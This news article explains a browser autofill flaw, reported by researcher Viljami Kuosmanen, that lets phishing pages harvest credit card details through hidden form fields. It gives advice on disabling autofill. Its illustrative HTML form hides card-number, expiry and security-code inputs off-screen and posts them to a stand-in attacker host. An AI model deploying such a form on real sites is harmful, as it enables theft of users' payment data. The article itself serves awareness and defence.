
Your browser might be filling in hidden fields and giving away your secrets

A hand on a laptop in dark surroundings.
It seems like you can’t go online lately without running into a new way to get infected with malware or have your identity stolen. And sometimes, it seems like there’s nothing you can do to avoid exposing yourself to trouble.

One of the more difficult traps to avoid is a phishing site, which presents itself as a legitimate page while requesting account credentials and other sensitive information. Now, there's apparently a browser vulnerability that lets phishing sites collect your autofilled information without your knowledge, and without your needing to do a thing, as ZDNet reports.

Basically, as security researcher Viljami Kuosmanen discovered, some browsers' autofill functionality will fill out even hidden fields on a page. The Finnish hacker posted sample code on GitHub demonstrating how he could grab user information such as credit card numbers, expiration dates, and security codes via hidden fields that Google's Chrome browser filled in automatically when the page was accessed.
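The basic trick can be sketched with a minimal HTML form. This is a hypothetical illustration, not Kuosmanen's actual proof-of-concept code: the victim sees only a couple of harmless-looking fields, while off-screen fields carry standard autocomplete hints that invite a vulnerable browser's autofill to populate them too.

```html
<!-- Hypothetical sketch of the technique; not the researcher's actual demo. -->
<form action="https://attacker.example/collect" method="POST">
  <!-- The only fields the victim actually sees -->
  <input type="text" name="name" autocomplete="name" placeholder="Name">
  <input type="text" name="email" autocomplete="email" placeholder="Email">

  <!-- Fields positioned off-screen; a vulnerable browser's autofill
       may fill these in along with the visible ones -->
  <div style="position: absolute; left: -9999px;">
    <input type="text" name="cc"  autocomplete="cc-number">
    <input type="text" name="exp" autocomplete="cc-exp">
    <input type="text" name="cvc" autocomplete="cc-csc">
  </div>

  <input type="submit" value="Sign up">
</form>
```

When the user autofills the visible name and email fields and clicks submit, any hidden fields the browser also populated ride along in the same POST request to the attacker's server.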

Various browsers are affected by the vulnerability, with Apple's Safari and the Opera browser joining Chrome. Daniel Veditz, a Mozilla security researcher, posted on Twitter that Firefox doesn't suffer from the issue because it only autofills fields that users can actually see and click on.

At this point, there doesn't appear to be any solution to the problem other than turning off autofill functionality in your chosen browser. For example, to turn off Autofill in Chrome, go to the menu, select Settings, then "Show advanced settings …," then uncheck "Enable Autofill to fill out web forms in a single click."

It’s up to browser developers to fix the bug for good, of course. In the meantime, if you decide to leave autofill turned on due to its general convenience factor, you’ll need to be even more diligent about making sure you’re only visiting known and trusted websites.

Mark Coppock